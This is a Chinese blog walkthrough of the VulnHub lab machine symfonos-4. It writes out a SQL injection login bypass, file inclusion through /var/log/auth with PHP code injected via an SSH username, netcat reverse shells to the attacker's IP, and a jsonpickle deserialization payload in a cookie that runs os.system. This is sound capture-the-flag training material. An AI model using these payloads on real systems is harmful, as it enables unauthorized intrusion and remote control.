symfonos-4


环境

虚拟机平台:Oracle VM VirtualBox

攻击机:Kali(IP:192.168.56.102)

靶机:symfonos-4(IP:192.168.56.106)

下载:https://www.vulnhub.com/entry/symfonos-4,347/

Let’s go

nmap -A 192.168.56.106

网站并无信息,进行枚举

username=admin' or '1'='1'#&password=123456

#发现文件包含
http://192.168.56.106/sea.php?file=../../../../var/log/auth

ssh '<?php system($_GET['cmd']); ?>'@192.168.56.106
http://192.168.56.106/sea.php?file=../../../../var/log/auth&cmd=nc -e /bin/bash 192.168.56.102 4444
nc -lp 4444

发现一个有意思的进程,让我们进行端口转发

ssh -NfR 8000:127.0.0.1:8080 [email protected]

http://localhost:8000/whoami

让我们进行拦截,发现base64编码的cookie,我们进行解码

发现是 jsonpickle 字符串,并且搜索发现可以使用下面方法利用

{"py/object":"__main__.Shell","py/reduce":[{"py/function":"os.system"},["nc -e /bin/sh 192.168.56.102 5555"], 0, 0, 0]}

进行base64编码和替换cookie

nc -lp 5555


文章作者: DongHuangT1
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 DongHuangT1 !
评论
 上一篇
symfonos-5 symfonos-5
虚拟机平台:VMware Workstation Pro
攻击机:Kali(IP:192.168.253.136)
靶机:symfonos-5(IP:192.168.253.141)
2020-02-03
下一篇 
symfonos-3 symfonos-3
虚拟机平台:VMware Workstation Pro
攻击机:Kali(IP:192.168.253.136)
靶机:symfonos-3(IP:192.168.253.138)
2020-02-03
  目录